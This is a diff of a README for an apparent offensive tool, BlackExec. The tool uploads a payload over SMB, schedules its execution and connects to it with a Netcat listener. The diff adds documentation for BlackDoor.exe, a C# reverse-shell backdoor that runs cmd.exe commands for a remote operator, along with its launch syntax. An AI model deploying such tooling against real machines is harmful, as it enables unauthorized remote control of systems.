ZadWon/black-exec/README.md

 1. Establish an SMB connection using the provided username and password.
 2. Upload the payload to the specified SMB share on the remote machine.
-3. Schedule a task to execute the payload at a specified time.
+3. Schedule a task to execute the payload.
 4. Connect to the payload listener either locally or remotely.

 The script handles both local and remote connections.
 For local connections, it spawns a Netcat listener on a random port.
 For remote connections, it specifies the IP address and port for the payload listener.

+# **Payload**

+BlackDoor.exe is a payload designed to establish a TCP connection to a remote machine and execute shell commands on that machine.
+It acts as a backdoor, providing remote access and control over the target system.
+The payload is implemented in C# and can be compiled into an executable file for deployment.

+To use BlackDoor.exe, follow these steps:

+1. Compile the C# code into an executable using a C# compiler or an integrated development environment (IDE) such as Visual Studio.
+2. Execute the compiled BlackDoor.exe file with the following command-line arguments:Replace **`<IP_ADDRESS>`** with the IP address of the machine where the payload should connect, and **`<PORT>`** with the port number on which the payload should establish the TCP connection.

+    ```
+    BlackDoor.exe <IP_ADDRESS> <PORT>
+    ```

+## **Dependencies**

+BlackDoor.exe does not have any external dependencies.
+It utilizes the core functionality of the .NET Framework and the C# programming language.

+## **Functionality**

+BlackDoor.exe provides the following functionality:

+- Establishes a TCP connection to the specified IP address and port.
+- Executes shell commands on the remote machine.
+- Sends the output of the executed command back to the client machine.
+- Supports continuous command execution until terminated.

+## **Command Execution**

+Once the BlackDoor.exe payload is executed on the target machine, it enters into a loop where it waits for commands from the client machine.
+Upon receiving a command, it executes the command using the Windows command prompt (**`cmd.exe`**).
+The output of the executed command is then sent back to the client machine.

+## **Security Considerations**

+When deploying the BlackExec.py, it is crucial to consider security implications.
+The payload grants remote access to the target machine, which can be misused if not handled properly.
+Ensure that the payload is deployed and used only in authorized and controlled environments.
+Implement appropriate security measures, such as network segmentation and access controls, to prevent unauthorized access to the payload.

+**Note:** The BlackDoor.exe payload is provided for educational and informational purposes only.
+It should be used responsibly and ethically, and with the explicit permission of the target machine's owner.

 ## **Conclusion**

-The SMB payload deployment script simplifies the process of deploying a payload onto a remote machine.
+BlackExec script simplifies the process of deploying a payload onto a remote machine.
 By leveraging the SMB protocol, it provides a secure and efficient method for uploading and executing the payload.
 The script's flexibility allows for different deployment scenarios, whether connecting to the local machine or sending connections to remote machines.